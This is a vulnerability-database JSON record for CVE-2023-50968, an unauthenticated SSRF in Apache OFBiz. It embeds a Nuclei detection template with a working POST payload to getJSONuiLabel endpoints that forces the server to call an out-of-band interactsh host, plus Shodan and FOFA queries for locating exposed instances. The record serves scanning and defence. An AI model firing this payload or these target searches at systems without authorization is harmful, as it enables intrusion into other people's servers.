{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-50968/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-50968/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-50968/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-50968/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-50968/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-50968"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-50968"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-50968.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2023-50968\n\ninfo:\n  name: Apache OFBiz < 18.12.11 - Server Side Request Forgery\n  author: your3cho\n  severity: high\n  description: |\n    Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n  impact: |\n    Unauthenticated attackers can read arbitrary file properties and perform SSRF attacks, potentially accessing sensitive internal resources or configuration files.\n  remediation: |\n    Upgrade Apache OFBiz to version 18.12.11 or later.\n  reference:\n    - https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q\n    - http://www.openwall.com/lists/oss-security/2023/12/26/2\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-50968\n    - https://issues.apache.org/jira/browse/OFBIZ-12875\n    - https://ofbiz.apache.org/download.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-50968\n    cwe-id: CWE-918,CWE-200\n    epss-score: 0.63373\n    epss-percentile: 0.99182\n    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: apache\n    product: ofbiz\n    shodan-query:\n      - html:\"OFBiz\"\n      - http.html:\"ofbiz\"\n      - ofbiz.visitor=\n    fofa-query:\n      - app=\"Apache_OFBiz\"\n      - body=\"ofbiz\"\n      - app=\"apache_ofbiz\"\n  tags: cve,cve2023,apache,ofbiz,ssrf,vkev,vuln\nvariables:\n  str: \"{{rand_base(6)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /partymgr/control/{{path}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        {{parameter}}={\"http://{{interactsh-url}}/api\":\"{{str}}\"}\n\n    payloads:\n      path:\n        - getJSONuiLabel\n        - getJSONuiLabelArray\n\n      parameter:\n        - requiredLabel\n        - requiredLabels\n\n    attack: clusterbomb\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: header\n        words:\n          - 'OFBiz.Visitor='\n# digest: 4b0a004830460221009421e0d42e1d3415506267f298b043a367b45a1d42ef8e0524d203a5e5fa76bc022100b29d763b4ed86bf85340985012808a55c7fcfe94074d71a16f2bfcb5b31c7c46:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-50968"
}